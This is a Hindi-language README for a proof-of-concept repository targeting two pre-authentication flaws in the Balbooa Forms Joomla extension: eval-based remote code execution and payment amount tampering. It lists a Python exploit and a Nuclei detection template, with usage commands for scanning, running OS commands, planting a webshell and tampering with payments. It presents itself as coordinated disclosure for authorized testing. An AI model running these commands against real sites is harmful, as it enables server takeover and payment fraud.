
PoC और Balbooa Forms (Joomla) में pre-auth RCE और payment tampering के लिए डिटेक्शन टेम्पलेट, जिसमें Python एक्सप्लॉइट और Nuclei डिटेक्शन टेम्पलेट शामिल हैं।
Joomla के लिए Balbooa Forms (com_baforms) में दो प्री-ऑथ कमजोरियों के लिए PoC और डिटेक्शन टेम्पलेट, 2.4.3.2 में ठीक किया गया।
Lulztigre द्वारा खोजा गया, Joomla Security Strike Team (JSST) के माध्यम से समन्वित प्रकटीकरण, 2026-08-19 को प्रकाशित। पूरा लेख: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| फ़ाइल | उद्देश्य |
|---|
balbooa_forms_poc.py | Python PoC, केवल stdlib, दोनों CVE को कवर करता है |
CVE-2026-67364.yaml | Nuclei टेम्पलेट, eval RCE का गैर-विनाशकारी डिटेक्शन |
शून्य निर्भरताएँ (Python 3.8+)। rce और detect मोड कोई फ़ाइल नहीं लिखते और कोई वास्तविक शुल्क नहीं लगाते; shell और pay ऑप्ट-इन हैं और प्रयोगशाला उपयोग के लिए हैं।
# 1. एक कमजोर (form-id, submit-btn) जोड़ी खोजें। गैर-विनाशकारी: प्रत्येक प्रोब एक
# अनाम सबमिशन है जिसमें echo-marker पेलोड होता है।
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. कमांड निष्पादन साबित करें। आउटपुट HTTP प्रतिक्रिया में लौटता है, कोई स्थिरता नहीं।
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. क्लासिक वेबशेल प्रमाण (केवल प्रयोगशाला - images/shell.php लिखता है)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. भुगतान राशि छेड़छाड़ (केवल प्रयोगशाला - वास्तविक शुल्क प्रयास करता है; --authorize की आवश्यकता है)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
एग्ज़िट कोड 0 = कमजोर/शोषित, 1 = साफ या विफल, 2 = उपयोग त्रुटि।
नोट्स:
[URL parameter = X] को संदर्भित करता है, और बटन पर कोई reCAPTCHA नहीं।--insecure स्व-हस्ताक्षरित प्रमाणपत्रों वाले HTTPS लक्ष्यों के लिए TLS सत्यापन छोड़ देता है।केवल डिटेक्शन: अनाम CSRF टोकन निकालता है, फिर echo-marker पेलोड के साथ छोटी form/btn श्रेणियों को स्कैन करता है और प्रतिक्रिया में मार्कर का मिलान करता है। कोई फ़ाइल नहीं लिखी जाती, कोई वास्तविक शुल्क नहीं लगाया जाता।
nuclei -t CVE-2026-67364.yaml -u http://target -v
nuclei v3.11.1 (Windows + Linux) के विरुद्ध सत्यापित: टोकन निष्कर्षण, 30-जोड़ी स्कैन (form-id 1..3 x submit-btn 1..10, clusterbomb), कमजोर जोड़ी पर 1 महत्वपूर्ण मिलान। ऑफ़लाइन मशीनों पर अपडेट जांच छोड़ने के लिए -duc जोड़ें। स्कैन जानबूझकर छोटा है; यदि किसी लक्ष्य पर अधिक फ़ॉर्म हैं तो पेलोड श्रेणियाँ बढ़ाएँ। भुगतान छेड़छाड़ (CVE-2026-67363) जानबूझकर nuclei में स्वचालित नहीं है: प्रत्येक प्रोब व्यापारी के गेटवे के विरुद्ध एक वास्तविक शुल्क प्रयास है।
केवल उन प्रणालियों के विरुद्ध उपयोग करें जिन्हें आप परीक्षण करने के लिए अधिकृत हैं।